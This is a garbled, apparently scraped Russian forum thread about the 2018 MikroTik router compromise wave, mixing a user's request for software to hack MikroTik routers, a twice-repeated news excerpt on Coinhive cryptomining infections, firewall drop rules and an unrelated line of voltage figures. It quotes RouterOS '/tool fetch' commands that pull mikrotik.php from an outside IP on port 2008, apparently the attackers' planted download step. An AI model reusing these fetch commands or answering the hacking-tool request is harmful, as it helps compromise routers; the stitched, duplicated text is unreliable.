Слышал многое в последнее время про уязвимости микротика, читал как ломают, но нигде не могу и скачать найти софт или хакерское ПО с помощью которого можно взломать микротик.
Может кто подскажет?
Более 200 000 маршрутизаторов MikroTik заражены майнинговой малварью
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
Дело в том, что сначала атаки концентрировались на территории Бразилии, но затем распространились и на другие страны, что уже привлекло внимание Trustwave. По данным аналитиков компании, по информации на 1 августа 2018 года неизвестные злоумышленники скомпрометировали более 72 000 роутеров MikroTik в одной только Бразилии. На тот момент подобные атаки практиковала всего одна хакерская группа, так как специалистам удалось выявить только один Coinhive-ключ.
У меня атаковали 5 серверов,небольших, проблема решается просто: создаем правило запрещающее весь остальной входящий трафик кроме разрешенного и фсё..(цепочка input_action drop)
хорошо что я попался тогда, когда хацкер оставлял фаервол и днс без изменений.
Вапще-то очень актуальная тема наньче этот взлом микротика. Уже 6 дней народ трясёт.
Самое странное что файл mikrotik.php пустой, адрес меняется, порт остаётся.
Очень смахивает на атаку этого злополучного диапазона айпи адресов.
Пароли то уже давно известны злоумышленнику, он мог бы так сильно и не палить себя…
Может кто подскажет?
DC 12.5v--0,45A 25v--0,4A 36V--0,3A.
всем добра!
Сразу несколько ИБ-специалистов и компаний зафиксировали волну атак, направленную против маршрутизаторов MikroTik по всему миру. Первым на происходящее обратил внимание бразильский исследователь, известный под ником MalwareHunterBR.
Дело в том, что сначала атаки концентрировались на территории Бразилии, но затем распространились и на другие страны, что уже привлекло внимание Trustwave. По данным аналитиков компании, по информации на 1 августа 2018 года неизвестные злоумышленники скомпрометировали более 72 000 роутеров MikroTik в одной только Бразилии. На тот момент подобные атаки практиковала всего одна хакерская группа, так как специалистам удалось выявить только один Coinhive-ключ.
add action=drop chain=input comment=\ "\" dst-port=53 in-interface=wan protocol=udp
Кто-то заранее собрал логпассы?
Вапще-то очень актуальная тема наньче этот взлом микротика. Уже 6 дней народ трясёт.
Очень смахивает на атаку этого злополучного диапазона айпи адресов.
Пароли то уже давно известны злоумышленнику, он мог бы так сильно и не палить себя…
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Ясно что подсеть одна и английская королева нам мстит...
tool fetch address=95.154.216.165 port=2008 src-path=/mikrotik.php mode=http
в конфиге httpd.conf менял ip 0.0.0.0
prefix=gui
----------------:8088/gui/static/config/index.html
/gui/static/config/index.html